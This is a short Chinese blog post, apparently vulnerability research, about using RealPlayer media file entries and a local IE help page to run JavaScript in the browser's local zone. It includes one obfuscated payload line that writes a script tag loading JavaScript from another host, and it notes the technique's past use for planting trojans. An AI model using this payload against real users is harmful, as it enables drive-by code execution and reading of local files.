文章摘要
文章讨论了在本地执行JavaScript代码的可能性,最初尝试将代码插入特定格式时遇到限制,但随后发现使用`file:///`可以成功执行。文章提到尝试将HTML注入后可能有效,并描述了在某些浏览器中本地执行JavaScript的限制虽多但仍可行。此外,文章提到在IE浏览器中点击代码后可执行指定JavaScript,但使用`window.open`却无法打开本地文件。尽管存在域限制,但发现部分边缘情况可能突破限制,未来仍可进一步探索。
很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊….于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
复制代码 代码如下:
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点……),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵……而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件…..正常下用window.open是不可以的…..域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵…….
真希望这些边缘的地方能出点问题,我感觉还是可能的 🙂
© 版权声明
文章版权归作者所有,未经允许请勿转载。
相关文章
